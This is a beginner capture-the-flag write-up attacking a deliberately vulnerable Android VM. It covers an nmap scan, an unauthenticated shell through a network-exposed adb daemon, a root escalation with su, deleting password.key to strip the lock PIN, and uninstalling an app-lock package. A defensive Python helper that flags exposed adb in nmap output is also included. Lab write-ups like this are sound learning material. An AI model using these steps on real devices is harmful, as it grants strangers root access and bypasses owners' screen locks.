Target Machine Diary 3 | Investigator

You can find the machine here: Investigator


This is my first time hacking an Android box. Actually, I have no experience in Android development, but this is a beginner vulnerable target machine, so I said to myself: it's a great way to learn something new!

Always start with nmap.

```
Princeling-Mac at ~ ❯ nmap -sC -sV -p- -oN nmap/initial 192.168.56.103
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-06 01:52 EEST
Nmap scan report for android-25abe18209db8058.zte.com.cn (192.168.1.10)
Host is up (0.00025s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
5555/tcp  open  adb     Android Debug Bridge device (name: android_x86; model: VMware Virtual Platform; device: x86)
8080/tcp  open  http    PHP cli server 5.5 or later
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Welcome To UnderGround Sector
22000/tcp open  ssh     Dropbear sshd 2014.66 (protocol 2.0)
| ssh-hostkey:
|   2048 19:e2:9e:6c:c6:8d:af:4e:86:7c:3b:60:91:33:e1:85 (RSA)
|_  521 46:13:43:49:24:88:06:85:6c:75:93:73:b5:1d:8f:28 (ECDSA)
MAC Address: 00:0C:29:37:42:7C (VMware)
Service Info: OSs: Android, Linux; CPE: cpe:/o:linux:linux_kernel
```

TCP port 5555 is the Android Debug Bridge (adb) daemon listening over the network instead of USB; we can connect to it with the standard adb client and exploit it from there.
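From the defender's side, the useful lesson of this scan is that an adb daemon reachable over TCP hands out a `shell` user to anyone who can connect, with no authentication, which is exactly what the rest of the walkthrough relies on. The following is an added triage helper, not part of the original post: it parses nmap's normal (`-oN`) output format into port records and flags an exposed adb service plus any service whose version string carries an old build year (a heuristic, not a vulnerability lookup). The sample scan text is constructed from the output above; the `stale_before` cutoff and the rule wording are my own assumptions.

```python
"""Triage nmap -oN output: parse the port table and flag services worth a second look."""
import re
from dataclasses import dataclass

# Sample nmap -oN output, constructed from the scan shown in the post.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for android-25abe18209db8058.zte.com.cn (192.168.1.10)
Host is up (0.00025s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
5555/tcp  open  adb     Android Debug Bridge device (name: android_x86; model: VMware Virtual Platform; device: x86)
8080/tcp  open  http    PHP cli server 5.5 or later
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Welcome To UnderGround Sector
22000/tcp open  ssh     Dropbear sshd 2014.66 (protocol 2.0)
| ssh-hostkey:
|   2048 19:e2:9e:6c:c6:8d:af:4e:86:7c:3b:60:91:33:e1:85 (RSA)
|_  521 46:13:43:49:24:88:06:85:6c:75:93:73:b5:1d:8f:28 (ECDSA)
MAC Address: 00:0C:29:37:42:7C (VMware)
"""

# A port line looks like "5555/tcp  open  adb  <free-form version>".
# Script output lines start with "|" and never match; neither do header or host lines.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
BUILD_YEAR = re.compile(r"\b(20\d{2})\b")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap_normal(text):
    """Return one Port record per PORT/STATE/SERVICE/VERSION row in nmap -oN output."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports.append(Port(int(m.group(1)), m.group(2), m.group(3),
                              m.group(4), m.group(5).strip()))
    return ports


def triage(ports, stale_before=2019):
    """Return (port, finding) tuples for open services a defender should act on.

    stale_before is an assumed cutoff: any version string that embeds a build
    year older than this is flagged for a patch-level check (heuristic only).
    """
    findings = []
    for p in ports:
        if p.state != "open":
            continue
        if p.service == "adb":
            # adbd over TCP authenticates nothing: every client gets the shell user.
            findings.append((p.number,
                             "adb daemon reachable over the network: unauthenticated "
                             "shell access; keep adbd on USB and block this port"))
        year = BUILD_YEAR.search(p.version)
        if year and int(year.group(1)) < stale_before:
            findings.append((p.number,
                             f"{p.service} build dated {year.group(1)}: confirm it is patched"))
    return findings


if __name__ == "__main__":
    for number, finding in triage(parse_nmap_normal(SAMPLE_NMAP_OUTPUT)):
        print(f"{number}: {finding}")
```

Run it against any `nmap -oN` file by replacing `SAMPLE_NMAP_OUTPUT` with the file contents; on the sample it reports the adb daemon on 5555 and the 2014-dated Dropbear build on 22000, while the PHP CLI server on 8080 carries no year and is left to manual review.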

Exploit via the adb service

```
Princeling-Mac at ~ ❯ adb connect 192.168.56.103
connected to 192.168.56.103:5555
Princeling-Mac at ~ ❯ adb shell
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)@x86:/ $
```

We can even get a root shell easily: just type `su`.

```
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)@x86:/ $ su
uid=0(root) gid=0(root)@x86:/ # find / -type d -name root
find: /data/property/persist.sys.dalvik.vm.lib: Input/output error
/data/root
```

And we get the first key!

```
1|uid=0(root) gid=0(root)@x86:/ # cd /data/root/
uid=0(root) gid=0(root)@x86:/data/root # ls
flag.txt
uid=0(root) gid=0(root)@x86:/data/root # cat flag.txt
Great Move !!!

Itz a easy one right ???

lets make this one lil hard


You flag is not here !!!


Agent "S" Your Secret Key ---------------->259148637
uid=0(root) gid=0(root)@x86:/data/root #
```

259148637 is the wrong PIN, but with the root shell we can simply remove the PIN.

```
uid=0(root) gid=0(root)@x86:/data/system # cd /data/system
uid=0(root) gid=0(root)@x86:/data/system # rm password.key
```

Reboot the box; now there is no PIN. If we try to open an app, it asks for a pattern instead.

Unlock it.

```
uid=0(root) gid=0(root)@x86:/ # pm list packages | grep lock
package:com.domobile.applockwatcher
package:bong.android.androidlock
package:com.martianmode.applock
package:com.android.deskclock
promote at ~ ❯ adb uninstall com.martianmode.applock
Success
```

:(((()))) The Android box is hard to use!!!
